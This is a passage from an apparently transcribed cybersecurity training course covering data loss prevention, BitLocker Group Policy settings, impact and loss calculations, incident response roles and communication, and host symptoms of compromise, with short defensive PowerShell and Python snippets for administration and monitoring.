disks, vendors back then would use methods such as writing the files to those floppy disks in nonstandard
ways and that was their form of copyright protection at the time.
Another example would be things like digital watermarks on images or videos to prevent piracy, such as at movie
screenings. Software and gaming Digital Rights Management these days often checks in with an Internet
server first before granting access to the software, or in the case of gaming, before the game
will begin. An example of this would be Microsoft Product Activation where, if we were to install – for
example – a Windows operating system, we would have to make sure it gets registered with Microsoft's
activation servers before we can fully use that operating system and receive updates.
In this video, you will learn how to control how valuable data is used.
Objectives
[Topic title: Data Loss Prevention. The presenter is Dan Lachance.] Aside from people, the most valuable
asset organizations have is information. In this video, I'll discuss data loss prevention. Data loss prevention is
often referred to in the industry as DLP. It controls how valuable data is used and protected. It deals with
intellectual property, confidential corporate data, as well as personally identifiable information or PII.
DLP prevents data leakage – data disclosure – outside of the organization to unauthorized users. DLP risks
include things such as malware – an infected or compromised system or network might use spyware agents
installed on hosts to gather data that is normally protected. And therefore, that data would then be disclosed
outside of the organization. Naturally, proper and up-to-date malware scanners help mitigate that risk.
Other ways that data loss can occur are through social media links. So, for example, users using Facebook or
Twitter might post sensitive information there either intentionally or unwittingly. So we need controls in place
to watch for that. Then there are things like mobile devices. These are a big risk in today's computing
environment, yet they also allow people to be very productive and mobile.
Laptops, tablets, and smartphones are computers, of course, and they should be treated as such. Most people
are familiar with the fact that yes, laptops and tablets are computers. A lot of people don't seem to consider
smartphones to be full-fledged computers, although really they are. So, as such, they need things like personal
firewalls installed, antivirus solutions installed, and so on. There are many infections targeting smartphones, so
user awareness is key here.
Other DLP risks include removable media such as USB flash drives. So, for instance, we might have a user
that copies sensitive data to a USB thumb drive and then takes that thumb drive elsewhere. And this has
been known to happen in many different cases even with sensitive military information. Risk origin usually
ends up going back to humans. It's usually us that cause these security breaches and it results in data loss.
Now think about examples that we've seen in the media even over the last few years, such as the Target security
breach where 110 million customer records were stolen. Now everybody needs to be involved with IT security
to prevent that type of thing from happening, especially at that scale. And, when we say everybody, we mean
end users, management, the board of directors. Everybody needs to be involved with IT security and awareness
is key.
Data loss prevention can be applied to data in use. That would be data being processed, for example, within an
application. Data loss prevention can also apply to data in transit such as encrypting data or limiting where data
can be sent or received over a network. For example, sensitive files might be able to be attached to e-mail
messages but the recipients might have to reside within the organization.
Then there's data at rest where we store data and it must be protected. Normally, this comes in the form of
making sure the data is encrypted when it's stored and also auditing access to that data. To implement data loss
prevention, the first thing we do is identify the data that needs to be protected. We then identify threats against
the data and then apply our DLP solution. As with all security controls, we need to monitor our DLP solution
as an ongoing task for effectiveness.
Now examples of this include things like Microsoft's Group Policy settings where we can control removable
media. Here, in the Local Group Policy Editor [The Local Group Policy Editor window is open. Running
along the top of the window is a menu bar. The window is divided into two sections. The first section is the
navigation pane which contains Local Computer Policy node which further contains two subnodes, Computer
Configuration and User Configuration. The Computer Configuration subnode contains three folders named
Software Settings, Windows Settings, and Administrative Templates. The User Configuration subnode contains
three folders named Software Settings, Windows Settings, and Administrative Templates. The second section is
the content pane which displays the information regarding Local Computer Policy. It contains Name tab
which has two options named Computer Configuration and User Configuration.] whether we're editing local
group policy which we are here or in Active Directory, we can control access to data being written to or read
from USB devices. For example, under Computer Configuration in the left hand navigator, I'm going to
expand Administrative Templates. And, under there, [He clicks the Administrative Templates which includes
various subfolders such as Control Panel, Network, and Windows Components. The Windows Components
subfolder further includes various subfolders such as BitLocker Drive Encryption and Desktop Window
Manager.] I'm then going to open up Windows Components and I'm going to look at BitLocker Drive
Encryption.
Now, in the Windows world, BitLocker allows us to encrypt entire disk volumes. So, when I expand
BitLocker Drive Encryption, I can see Fixed Data Drives, Operating System Drives, and what we're looking
for – Removable Data Drives. Now, when I select Removable Data Drives on the left, on the right I get a
handful of settings. [He refers to the content pane which includes information related to the Removable Data
Drives. A table is displayed with column headers titled Setting, State, and Comment. The table includes
various rows under Setting such as Control use of BitLocker on removable drives and Deny write access to
removable drives not protected by BitLocker. He clicks the Deny write access to removable drives not
protected by BitLocker whose State is Not configured and Comment is No. The Deny write access to
removable drives not protected by BitLocker dialog box opens. The window contains two buttons named
Previous Setting and Next Setting adjacent to the Deny write access to removable drives not protected by
BitLocker message. Under that there are three radio buttons named Not Configured, Enabled, and Disabled.
The Not Configured radio button is selected by default. The page further contains two sections titled Options
and Help.] For example, one of them is to deny write access to removable devices that aren't protected by
BitLocker encryption.
So, to prevent data loss or disclosure of sensitive information outside of the organization, we might require
encryption to be used on removable thumb drives before data can be written to them.
Mobile devices are very convenient and can make people productive, but at the same time they introduce new
challenges and risks for IT security specialists. There are challenges with the BYOD – Bring Your Own Device –
environment, where users can bring personal mobile devices to be used for work purposes. Now, when this is
done, the organization should be using some kind of centralized mobile device management or MDM solution
where, for instance, a VPN connection would be triggered on your smartphone when a certain app that requires
access is started.
Also strong device authentication requirements should be put in place such as PKI certificate authentication or
multifactor authentication. The device should be encrypted. We also should have remote wipe capabilities. So,
if the device is lost or stolen, we can either wipe just the company data from it or basically do a factory reset
on the device to prevent sensitive data loss.
We can also control app installations on mobile devices using our centralized MDM tool so that users don't
install apps that might be malicious. We can also do things like disable Bluetooth, disable the camera, and
many other options. Device partitioning or containerization is very important with mobile devices. It allows us
to perform a selective wipe. So we might, for instance, have a corporate partition on a mobile device where
we've got corporate apps, settings, and data. And then there's a personal partition with personal apps, settings,
and data.
So, if the smartphone – for instance – is lost, we could perform a selective wipe against the corporate partition
only. Solutions can also prevent data from being forwarded in the case of things like e-mail, or from being printed,
copied and pasted, or even stored in alternate locations. For example, sensitive corporate data in the corporate
partition on a smartphone might not be allowed to be stored in other locations such as a user's
personal Dropbox account.
[Topic title: Prevent Data Storage on Unencrypted Media. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to prevent data storage on unencrypted media. Here, on my Windows server, I'll begin by
going to the Start button in the bottom left and I'll type in "group". [He types group in the Search bar.]
Now I'm going to start the Group Policy Management editor so that we can turn on some BitLocker Drive
Encryption options as per our needs. [The Group Policy Management window opens. Running along the top of
the page is the menu bar which contains menu options such as File, Action, View, Window, and Help. The
window is divided into two sections. The first section is the navigation pane which contains Group Policy
Management node which contains Forest quick24x7.com and Sites nodes. The Forest quick24x7.com node
contains Domains subnode which further contains quick24x7.com subnode. The quick24x7.com subnode
includes various folders such as Default Domain Policy, Boston, and Group Policy Objects. The Default
Domain Policy is selected by default. The second section is the content pane which displays information of the
option selected in the first section. The content pane contains four tabs named Scope, Details, Settings, and
Delegation. The Scope tab is selected by default.] So, in the left hand navigator where I see a list of my GPOs
or Group Policy objects, I'm going to right-click on the Default Domain Policy. This GPO will apply to all
users and devices within the domain. So I'm going to right-click on the GPO [He right-clicks the Default
Domain Policy folder. As a result, a shortcut menu appears which includes various options named Edit,
Enforced, and View.] and choose Edit. That opens up the Group Policy Management Editor screen.
Now BitLocker options are tied to the computer. They're not tied to the user like encrypting file system or EFS
is. So therefore, on the left, that tells me I'm not going to go down under User Configuration but instead under
Computer Configuration. So that's correct. I'm going to expand the Policies under Computer Configuration
under which I'll then open up Administrative Templates - Windows Components. And now we see on the left
BitLocker Drive Encryption.
Now, when we select BitLocker Drive Encryption, we see a number of settings over here on the right such as
to store BitLocker recovery information in Active Directory and so on. But we've also got three folders of
BitLocker settings, one for Fixed Data Drives in a machine, another category for Operating System Drives in a
machine, and finally what we're looking for – Removable Data Drives. Let's open that up by double-clicking.
The first thing I want to do is go into the option here that we need. It's called...I'll just double-click on it –
Deny write access to removable drives not protected by BitLocker. So what I want to do is make sure that that
option is Enabled. [He selects the Enabled radio button.] Once the option is Enabled and we save our
configuration, [At the bottom of the Deny write access to removable drives not protected by BitLocker window
are three buttons named OK, Cancel, and Apply. He clicks the OK button.] which simply means clicking OK,
so we can now see here that the State column will have Enabled once that's been turned on. It's a matter of
Group Policy refreshing on other machines that are affected by this GPO before they put the setting into effect.
Now that can take anywhere from 90 minutes to many hours, maybe even days in some multisite
environments. So check your network documentation to see how long that should take. [The Command
Prompt window opens.] Now that's fine for configuring BitLocker settings. But how do we actually turn it on?
Well, on a single Windows machine from the command line, we could use the manage-bde command line
tool [He executes the following command line: manage-bde.] where BDE stands for BitLocker Drive
Encryption.
If I just type that in without any parameters, notice it pops up a help screen. [He refers to the output of the
command.] So, from the help screen, I can clearly see the parameters that will enable BitLocker Drive
Encryption, in this case, "-on" for a specific volume, or I could turn it off and so on. Now there's not an easy
way to do this built directly into Group Policy. What we could do is create a script that uses the manage-bde
command line tool and that script could be delivered and run through Group Policy for machines.
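As a hedged sketch of what such a script might look like – the drive letter is a placeholder and you would adapt the key protector options and error handling to your environment – a small Python wrapper could shell out to manage-bde to turn encryption on for a volume.

import subprocess

def enable_bitlocker(volume: str) -> bool:
    """Turn on BitLocker for a volume by calling manage-bde.
    Assumes an elevated prompt on a Windows machine; add key protector
    options (for example a recovery password) as your policy requires."""
    result = subprocess.run(["manage-bde", "-on", volume],
                            capture_output=True, text=True)
    if result.returncode != 0:
        print(f"manage-bde failed for {volume}: {result.stderr.strip()}")
        return False
    print(result.stdout)
    return True

if __name__ == "__main__":
    enable_bitlocker("E:")   # placeholder volume; deliver via a Group Policy startup script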
In this video, you will learn how to determine the effect of negative incidents.
Objectives
[Topic title: Scope of Impact. The presenter is Dan Lachance.] Today's organizations face many potential
threats against their IT systems and data. In this video, we will talk about the scope of impact.
The first thing to do is to look at assets that have value to the organization. Secondly, we then identify threats
related to those assets, which allows us to then prioritize those threats so that we know where to focus
resources and energy. We then need to determine the business impact or the scope. So, if a threat materializes
against an asset, does it affect one user, an internal user, or millions of customers? Is it affecting
one computer, an entire network, or an entire IT ecosystem? We have to think very carefully about what is
being impacted when negative incidents occur.
Downtime always has a financial impact because time is money, whether that is an e-commerce web site
that's down for a few hours and thus can't sell things to customers on the Internet, or some kind of a payment
system that's unavailable so customers can't buy anything, which ends up being very irritating to customers.
And part of what we want to do to retain customers is not irritate them.
Recovery time is related to incident response. This has to be done proactively, has to be planned in terms of an
incident response policy so that when these things occur, the appropriate technicians know their roles and
know what to do to get systems or data up and running as quickly as possible. Now, in terms of individual
components like for servers and network equipment, we should consider the MTTR – the mean time to
recovery. We should also think about the RTO – recovery time objective – in general when negative incidents
occur.
The recovery time objective really stipulates the maximum tolerable amount of downtime, let's say, for an e-
commerce web site before it has a serious negative impact on the organization. The SLA or service-level
agreement is a contractual document between a service provider and a service consumer and it can be
negotiated. Often it references details such as downtime that is to be expected if it relates to IT services. So
let's talk about this in the context of an organization purchasing public cloud provider services.
So the public cloud provider SLA to the consumer will have guaranteed uptime. So ideally we'll have very
minimal downtime. There's also items related to response time not just for IT systems to make sure that they're
responsive over the Internet to the cloud but also response time for technical support when we should expect to
get support from the provider. Then, of course, the SLA has a section that deals with consequences. Now the
SLA isn't just about everything being on the back of the provider. Consequences normally turn out to be
credits to the consumer, for example, for the next month's usage of cloud services.
Pictured here, I've gone into my web browser and popped up the SLA for Microsoft Azure cloud computing
specifically for virtual machines. [The SLA for Virtual Machine web page is open. Running along the top of
the Microsoft Azure web page there are various tabs named Why Azure, Resources, and Support. The Support
tab is selected by default. The rest of the page contains information related to SLA for Virtual Machines.] So
we can see here that it talks about 99.95% uptime. And, as I go through this, [The page includes various
expandable sections such as introduction, General Terms, and SLA details.] I see the sections within the
document. So I can see a definition of terms, downtime, service credits [The SLA details section is expanded
which includes various information such as Additional Definitions, Downtime, and Service Credit.] that would
be applied if Microsoft doesn't meet up to their stipulations inside the SLA, and so on.
So there are various types of SLAs. You might even have one within your organization if you're large enough
because departmental charge back might be used for IT services. When bad things happen to IT systems or
data, we have to think about the economic impact. The SLE is the Single Loss Expectancy. This is a value that
is derived by taking a look at historical data as well as current data and determining what type of numeric
value, monetary value will be associated with some kind of a negative incident.
The ARO is the Annual Rate of Occurrence that we could expect for a negative incident. So therefore, the
ALE is the Annual Loss Expectancy from negative incidents occurring. The ALE is derived by taking the
Single Loss Expectancy and multiplying it by the annual rate of occurrence. This is used to determine if the
security controls that we have in place provide a cost benefit. We don't want to pay more for a security control
to protect an asset when the asset isn't worth that much, or when the likelihood of a failure and the cost of
recovering from it don't justify the expense. In other words, we don't want to pay more for security controls
than the asset is worth.
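Purely as a worked example with assumed figures: if a single incident is expected to cost 8,000 dollars (the
SLE) and we expect it roughly once every two years (an ARO of 0.5), the arithmetic looks like this.

# Sketch with hypothetical figures: ALE = SLE x ARO
$SLE = 8000        # single loss expectancy, in dollars
$ARO = 0.5         # annual rate of occurrence (once every two years)
$ALE = $SLE * $ARO # 4000 dollars per year
# A control costing much more than about $4,000 per year to protect this asset is hard to justify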
The other thing to consider in terms of the impact of negative events is data integrity. If we've got a security
breach, then data trustworthiness might go out the window depending on what we've got in place. So we might
have audit trails to track activities so that we can trust and rest assured that data has not been tampered with or
disclosed to unauthorized parties. Then there are hashes and signatures.
So, for example, we might use file hashes against a file that results in a unique value that is the hash. And,
when we compute that again in the future if it's different from the original hash, we know something has
changed in the file. At the e-mail level, we might look at digital signatures. Here, the private key comes from
a PKI certificate, which contains a private and public key pair. The private key is used to generate a unique
digital signature, for instance, on a mail message. The recipient verifies the authenticity of that signature by
using the related public key.
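As a minimal sketch of the file hashing idea in PowerShell – the file path and the stored baseline value here are
hypothetical – we could compare a file's current SHA-256 hash with the hash recorded when the file was
known to be good:

# Compare a file's current hash against a previously recorded baseline (hypothetical values)
$baselineHash = '9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08'
$currentHash  = (Get-FileHash -Algorithm SHA256 -Path 'C:\Data\contract.pdf').Hash
if ($currentHash -ne $baselineHash) {
    Write-Warning 'File has changed since the baseline hash was recorded'
}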
Finally, for critical system processes, we should have failover mechanisms in place. This could be as simple as
using a failover cluster where you've got at least two servers offering the same, let's say, line of business
application. If one server fails, the other one picks up and users are redirected to the running server. Of course,
for that to work effectively, all servers within the cluster should be using the same shared storage so they have
the same up-to-date data. But, in some cases, you might use data replication across different regions or even to
an alternate site. A hot site is another site that we can use for business operations if the primary site fails for
some reason.
But the reason it's called a hot site is because it's ready to go at a moment's notice. So we've got a facility. It's
got equipment, software. It's even got up-to-date data. We don't rely on data backups with a hot site. Now the
way that we have the up-to-date data is by having replication that occurs constantly from the primary site to
this alternate hot site. Ideally, it would be synchronous replication, which means when data is written in the
primary site, at the exact same time it's also written to the alternate site. If there's a bit of a delay with the
replication, then we would call it asynchronous replication.
In this video, find out how to identify stakeholders related to incident response.
Objectives
[Topic title: Stakeholders. The presenter is Dan Lachance.] In this video, I'll discuss stakeholders.
Stakeholders have a vested interest in asset protection. And they should be involved in all project phases. Now
an IT project should include security in all phases from its inception all the way out to the deployment of a
solution, the ongoing maintenance, and the inevitable decommissioning. Security can't be an afterthought. It's
got to be always a part of every phase of a project. Now stakeholders have an interest then in our IT assets
whether they be specific IT business processes or whether they are related to IT systems or data.
Stakeholders should also be involved in security policy creation. Organizational security policies dictate what
is acceptable and what is not and essentially how systems and data are protected. Now security policies don't
just get created and then they're good to go and never get changed or revisited. So making changes and
reviewing security policies is an ongoing task that never ends. And one of the reasons for this is that
technology is changing constantly – so, as it relates to a specific business, there will be different ways of using
technology that support business objectives. And, as a result, there could be new threats that might materialize
that were not there before. Think of when mobile phones and smartphones began to be used in business
environments. That introduced a new set of attacks that weren't possible before because we have another
computing device that a lot of people just aren't treating as a computing device.
They're not thinking about the fact that it could be infected with malware as easily as a Windows computer
could be. Stakeholders also need to be involved with communication regarding security incidents that occur. In
some cases, this might be mandated by law. So, when there's a security breach, affected stakeholders must be
notified.
First part of working with stakeholders is identifying who they are and what interests they have in our IT
systems and data. This would include internal stakeholders like human resources staff, legal, marketing,
management, and then – of course – externally customers. There needs to be a formal change management
process within organizations. And, if we look at frameworks like ITIL, they stipulate this very clearly. So all
changes that need to be made need to be captured accordingly. And they need to go through the proper approval
process before they are made.
Now any changes that are made need to be documented. And this needs to be made available to stakeholders.
There also needs to be regular meetings that are held especially after incidents. But really this should be an
ongoing task all of the time. With regular meetings, some or all stakeholders might be involved at the same
time or at different times – so different meetings or one big meeting. And, in these meetings, lessons learned
from incidents can be reviewed to improve business processes and security related to them.
Upon completion of this video, you will be able to recognize incident response roles.
Objectives
[Topic title: Role-based Responsibilities. The presenter is Dan Lachance.] In this video, I'll talk about role-
based responsibilities.
The principle of least privilege stipulates that only required permissions to perform a specific business related
task should be granted and no more. This also means that data needs to be provided on a need-to-know basis
only. Separate user accounts allow for role-based responsibilities. It allows for auditing. So we can track which
users performed which actions against systems or files on certain dates and times. If everyone is logging in
using the same user account, this can't be done.
This is especially important with administrative accounts where all too often the same Windows Administrator
account or Linux root account keeps getting used by different administrators. This is not recommended. Role-
based responsibilities fall under many different categories including technical. With technical role-based
responsibilities, there should be separate administrative accounts as we've mentioned such as the Windows
Administrator account and the Linux root account not being shared by multiple admins.
Administrative delegation allows other administrators to take control of some aspect of an IT system. An
example would be an Active Directory where we could delegate security permissions to another administrator
to manage a different organizational unit so that they could work with user accounts and groups and so on in
Active Directory only within a certain area. So, as an example here in Active Directory Users and
Computers, [The Active Directory Users and Computers window is open. Running along the top of the page is
a menu bar which contains File, Action, View, and Help menu options. The window is divided into two
sections. The first section is the navigation pane which contains a node named Active Directory Users and
Computers, a folder named Saved Queries, and a subnode named fakedomain.local. The
fakedomain.local subnode includes various folders such as Domain Controllers, ProjectManagers, and Users.
The Users folder is selected by default. The second section is the content pane which displays user groups in a
tabular format. The column headers are Name, Type, and Description. The rows under Name include
Administrator, Guest, and HelpDesk.] I've got a group called HelpDesk. And I want to make sure that they are
delegated permission to the ProjectManagers OU.
So I'm going to right-click on the ProjectManagers OU and choose Delegate Control [As a result, Delegation
of Control Wizard opens. At the bottom of the wizard there are four buttons named Back, Next, Cancel, and
Help. He clicks the Next button.] and click Next. And, for Selected users and groups, [He refers to the
Selected users and groups text box which contains Add and Remove buttons at the bottom of the text box. He
clicks the Add button.] here I'm just going to type in help. [The Select Users, Computers, or Groups dialog
box opens. The dialog box contains two fields and one text box. In the Select this object type field, Users,
Groups, or Built-in security principals is selected by default and adjacent to that is an Object Types button. In
the From this location field, fakedomain.local is selected by default and adjacent to that is a Locations button.
In the Enter the object names to select (examples) text box, he types help and adjacent to that there is a Check
Names button. At the bottom of the dialog box are three buttons named Advanced, OK, and Cancel.] And let it
find the helpdesk group [He types help in the text box and clicks the Check Names button which finds the
HelpDesk group. And he clicks the OK button.] and I'll OK that and continue on by clicking Next. [The
HelpDesk (FAKEDOMAIN\HelpDesk) is added in the Selected users and groups text box. He clicks the Next
button.] And maybe what I want the helpdesk to be able to do for, [The Delegation of Control Wizard
contains two radio buttons. The first radio button is named Delegate the following common tasks. The second
radio button is named Create a custom task to delegate. The first radio button includes various check boxes
such as Reset user passwords and force password change at next logon and Modify the membership of a
group.] let's say, users that are project managers is reset user passwords and maybe Modify the membership of
a group. And I'll just proceed through the wizard. [He selects the Reset user passwords and force password
change at next logon and Modify the membership of a group checkboxes. And clicks the Next button and then
Finish button.] And now it's done.
So what we've just modified is an ACL – the access control list – in Active Directory for that organizational
unit so that the helpdesk members can modify user accounts in certain ways. But ACLs can apply to web
applications, databases, file servers, and so on. So, for role-based responsibilities, it's important that our
IT solutions, such as applying an ACL to secure data, align with business goals because, in the end, the only
reason IT is useful is that it solves business problems.
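If you wanted to confirm from PowerShell that the delegation landed on the OU's access control list, a quick
sketch – assuming the ActiveDirectory module is available, and using the same OU and group names as this
demo – might look like this:

# List ACL entries on the ProjectManagers OU that mention the HelpDesk group
Import-Module ActiveDirectory
(Get-Acl 'AD:\OU=ProjectManagers,DC=fakedomain,DC=local').Access |
    Where-Object { $_.IdentityReference -like '*HelpDesk*' }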
Now role-based responsibilities are also important for incident response and investigation because people need
to know what role they must play when an incident occurs. Now, of course, there needs to be an ongoing
evaluation of security control effectiveness to ensure it's still valid and doing what it's supposed to do such
as permissions to the file system or to organizational units in Active Directory.
At the management level, there are things like security policies that dictate how things are to be done and what
is acceptable and what is not. Step-by-step procedures, for instance, might be outlined in a disaster recovery
plan for a specific server. So, as long as people know their roles in disaster recovery in case of a malware
infection or some kind of a malicious attack, they'll know the step-by-step procedures to get that system up and
running as quickly as possible and as efficiently as possible.
At the management level, there is the ongoing task of business process improvement. There's always a way to
improve business processes – and specifically, in our case, the IT systems that support them – while making
sure they're secure. Management role-based responsibilities are, of course, also related to personnel for
hiring and firing and so on. At the law enforcement level in different jurisdictions, there are different rules that
would apply and are enforceable such as with cloud storage, which may or may not be allowed for certain
types of businesses in certain countries and depending upon the nature or classification of the data that's being
stored.
There's also evidence gathering for forensics, especially digital forensic investigation, where the chain of
custody must be maintained so that evidence is tracked at all times and we know who had
access to it and where it was. And, of course, there are certain applicable laws for technology solutions that
differ in different areas such as whether or not it's okay to use somebody else's open Wi-Fi.
Incident response providers also play a role. And it's also a service that you can pay for from a third party. So
we can outsource it with a service-level agreement that dictates exactly what the responsibilities of the incident
response provider are. And, in some cases if we don't have the in-house expertise, then it might actually
improve incident response time by having an external provider handle it. They might also be able to do remote
investigations over the Internet instead of having to physically be on-site.
In some cases, if required they might come on-site and they will know what digital forensics techniques to use
as well as which tools to use. And we'll be looking at some of those in some other demos.
Upon completion of this video, you will be able to describe the options for disclosing an incident.
Objectives
describe incident disclosure options
[Topic title: Incident Communication. The presenter is Dan Lachance.] Bad things unfortunately happen to
organizations; the issue is how they're communicated and handled. In this video, we'll talk about incident
communication.
In some cases, communication to affected parties may be required whether those parties are the public or
affected individuals specifically or even just affected business entities. Sometimes there is limited disclosure of
exactly what happened with a negative incident that we must reveal to relevant stakeholders. Part of this is data
loss prevention or DLP where we want to make sure that we prevent the unintentional release of incident
information beyond what is required and what we ethically should be releasing.
There are sometimes legal and regulatory requirements that determine exactly what should be reported, how,
and who should be notified. For instance, with personally identifiable information or PII as related to U.S.
HIPAA, a security breach involving more than 500 individuals must be reported. Similar issues are happening
around the world under different legislation, such as Canada's Digital Privacy Act.
So, for example, customer notification requirement might be something we have to do for credit card data
security breaches. We have to consider secure incident communication methods in the first place. We might
also be using a third-party incident response provider. So we want to have secure communication with them
after a negative incident occurs.
On the public relations or PR side, it's crucial that we have a team that relates the information that needs to be
delivered to the appropriate stakeholders properly. So as we know, it's not always what the message is but
rather how it's being delivered that has the biggest impact. So we have to think about that from the public
relations side. If there's poor communication, it could result in reputational damage to the company or agency,
or in irate customers – both of which are bad for business.
In this video, find out how to analyze host symptoms to determine the best response.
Objectives
[Topic title: Host Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll discuss
host symptoms and response actions.
Before we can determine what behavior is abnormal or suspicious, we've got to know what's normal. At the
host level, it's important to establish a normal usage baseline, which we compare current activity against to
detect anomalies.
Performance degradation especially over an extended period of time is an easy indication that we've got some
kind of a problem, which could even be related to, for instance, compromise or some kind of malware
infection. Unexpected configuration changes can also indicate that we've got some kind of a problem, maybe
we're infected. For example, the next time you start your web browser if the home page has been changed to
something that you know you did not change it to and you cannot revert it otherwise, you've got some kind of
an infection, maybe some kind of spyware or adware that's made the change for you – either way it's not good.
The same goes for unexpected apps that get installed in the background. Now, in some cases, when users
install free software, they just click through the wizard. They click next, next, next without really reading. And
sometimes there are additional pieces of software that get installed. However, other times unbeknown to the
user, without their consent a script or a program can run in the background. And it could result with something
being installed that we didn't want installed. Now, in some cases, it can be very difficult to remove that
installed app. Now, on a Windows client station, you could revert to a system restore point – an earlier point
in time prior to the app being installed – but it's not always quite that basic, especially on the server side or
with Linux.
With processor consumption, the system will slow down. Users will probably open a helpdesk ticket
quite quickly if this continues. Now sometimes the culprit could be as simple as a web browser plugin that we
didn't install, but rather installed automatically in the background. Web browser plugins give additional
functionality for reading PDFs and so on. But you may want to check your web browser plugins or even
prevent additional plugins from installing automatically to speed up your web browsing experience.
Now that's specific to a web browser but it is important. Of course, if we've got some kind of a malware
infection, that might show up as processor utilization spiking and maybe even staying spiked for periods of
time. Now what we should do is take a look at our running processes and try to isolate what is causing the
processor utilization.
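One quick way to start isolating the culprit – a simple sketch, not a full diagnostic procedure – is to list the
heaviest CPU consumers in PowerShell:

# Show the ten processes that have accumulated the most CPU time
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10 Name, Id, CPU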
Also sometimes an infected host might be used to send spam e-mail. And that's why outgoing firewall rules
on every host should probably carefully look at SMTP traffic leaving the host to verify whether it's legitimate
or not. And that's one of the reasons why it's important that every device including smartphones have a
personal firewall installed and configured appropriately. And those things can be configured centrally. It's not
like we have to go to every device and configure the firewall, that's not the case.
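As a hedged sketch of that idea on a single Windows host – the rule name is made up, and whether blocking
outbound TCP port 25 is appropriate depends entirely on whether that host legitimately needs to send mail – an
outbound firewall rule could look like this:

# Block outbound SMTP from a workstation that has no business sending mail directly
New-NetFirewallRule -DisplayName 'Block outbound SMTP (example)' -Direction Outbound `
    -Protocol TCP -RemotePort 25 -Action Block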
Also an infected host might be used as a zombie for a distributed denial of service attack or a DDoS attack.
Now zombie, as you might guess, is an infected machine that's under malicious user control. And a botnet or a
zombie net is a collection of these computers – could be in the dozens, hundreds, even thousands – that are
under control of a malicious user. And that user can issue some kind of command set to these zombies and
have them attack, you know, a victim network or a victim computer and so on.
This is another one of those commodities actually that gets traded – if you will – on the black market, on the
Internet along with credit card numbers and PayPal credentials and so on. Once malicious users have these
zombie nets under their control, they can actually sell it to others so that others can execute DDoS attacks
against victims maybe in return asking for ransom payment and so on – either way it's all bad stuff.
Memory consumption could also be an indication of, well, poor programming. It might require simply a reboot
of the system. But it also could be a problem with a network attack of some kind. So we might have a remote
buffer overflow attack where an attacker is sending more data than the programmer intended for a specific
variable in memory.
Now, when we overwrite beyond what is allocated in memory – for example – for a variable, the potential
exists for us to gain remote administrative privileges to that system or potentially to corrupt other data beyond
what was allocated, thus causing a service or the whole host to crash or malfunction somehow. So we should
be monitoring these things – memory, CPU utilization, network traffic, and so on.
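To give a flavor of what that monitoring could look like on a single Windows host – this is only a sketch, and in
practice you'd feed thresholds and alerts into a monitoring system – performance counters can be sampled from
PowerShell:

# Sample CPU, memory, and network counters a few times at five-second intervals
Get-Counter -SampleInterval 5 -MaxSamples 3 -Counter `
    '\Processor(_Total)\% Processor Time', '\Memory\Available MBytes', '\Network Interface(*)\Bytes Total/sec'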
Storage space consumption is another issue on a host. Now that space could be consumed legitimately by
temporary files, but consider the malicious standpoint – and we're talking here about being a cybersecurity
analyst, an expert in security. The host could have been compromised in the past and is now being used by an
attacker to store files.
So that could be another reason why we're running out of disk space. It's another one of those aspects of
computing that should be monitored periodically.
Storage space consumption ideally would send alerts to administrators when it gets beyond a threshold – same
thing with memory, CPU, and network utilization. Unauthorized software is software that was not installed by
the user. So usually the user didn't install it or if they did intentionally install it, they thought it was something
else. It might have looked benign. So it could have been like a trojan horse piece of software, but really it's
malware.
Now, in some cases depending on your systems, it's possible for software to be installed without user consent
in the background. In the Windows world, that's precisely what User Account Control or UAC is for. It will
prompt the user. Well, it depends on the configuration. But it can be configured to prompt the user to allow
things to run in the background. The idea is we don't want things installed without user consent. Now that
being said – User Account Control – UAC is not designed to replace your malware scanners. You still need
those in addition. This just complements them.
So unauthorized software might be something users are able to install, and it might actually be what the user
wants, but not what the organization wants. This is bad news. We don't want users to have any ability to install
unauthorized software that isn't approved by the company. That also goes for apps on smartphones because
what happens then is it increases the attack surface. We've got things that aren't necessary. And it just opens up
the possibility for more vulnerabilities being exploited by the bad guys.
Malicious processes run in the background and usually are a result of some kind of malware infection and
certainly it can degrade system performance. They may also have a corresponding service. Or, in the case of
Linux, a daemon that runs in the background. So we should be monitoring our background services in
Windows or daemons in Linux. Every now and then what you might want to do is from the command line, get
a list of services and pipe it out to a file. Of course, you would automate this. And then periodically you would
compare the current list of running services with what you've piped out to a file.
In Windows, you might do this in PowerShell; in Linux, we might write a shell script to do it. We should
always make sure that any processes that are running are allowed to be running and are legitimate.
At the same time, we want to be careful that we don't kill any running processes that we think are nefarious
when, in fact, they are required by the operating system.
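A minimal PowerShell sketch of that baseline-and-compare idea – the baseline file path is hypothetical, and in
practice both steps would be scheduled and automated:

# Step 1 (run once, on a known-good system): record the names of running services
Get-Service | Where-Object { $_.Status -eq 'Running' } |
    Select-Object -ExpandProperty Name | Out-File 'C:\Baselines\services.txt'

# Step 2 (run periodically): compare current running services against the baseline
$baseline = Get-Content 'C:\Baselines\services.txt'
$current  = Get-Service | Where-Object { $_.Status -eq 'Running' } |
    Select-Object -ExpandProperty Name
Compare-Object -ReferenceObject $baseline -DifferenceObject $current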
When you enable auditing...and auditing comes in many forms. You can audit, for example, failed logon
attempts on a server, access to delete a file (whether it succeeds or fails), or users creating other user
accounts. All of that can be audited. So we want to use auditing to detect unauthorized changes. We want to
make sure that we don't bypass the change management control system in place in the company where we've
got a set structure, a formal procedure for making changes.
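On a single Windows machine, one hedged example of turning on that kind of auditing – here, failed logon
attempts; the subcategory chosen is just an illustration – uses the built-in auditpol tool:

# Enable failure auditing for logon events (requires administrative rights)
auditpol /set /subcategory:"Logon" /failure:enable
# Review the resulting events in the Security log; failed logons appear as event ID 4625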
Data exfiltration really deals with data that leaks out of the organization and is thus made available to
unauthorized users. Often this is done without user consent. And again, it could be a result of malware, could
also be a user that intentionally copies sensitive data to removable media whether or not they intend to provide
it to unauthorized users. Again, there are things that we can do to prevent this from happening or to audit this
type of activity.
Find out how to analyze network symptoms to determine the best response.
Objectives
[Topic title: Network Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll talk
about network symptoms and response actions.
Before we can detect what's not normal on the network just like with a host, we have to know what is normal.
So, ahead of time, it's crucial that we establish a normal network usage baseline – against which we compare
current activity to detect anomalies.
Now all systems on the network or an individual host or a collection of hosts could be affected by some kind of
network compromise or malware infection. So therefore, network traffic monitoring tools need to be in place.
And they come in many different forms. For example, an intrusion detection system or IDS is either an
appliance – it could be a virtual machine or a hardware appliance – or it could be software that we install that
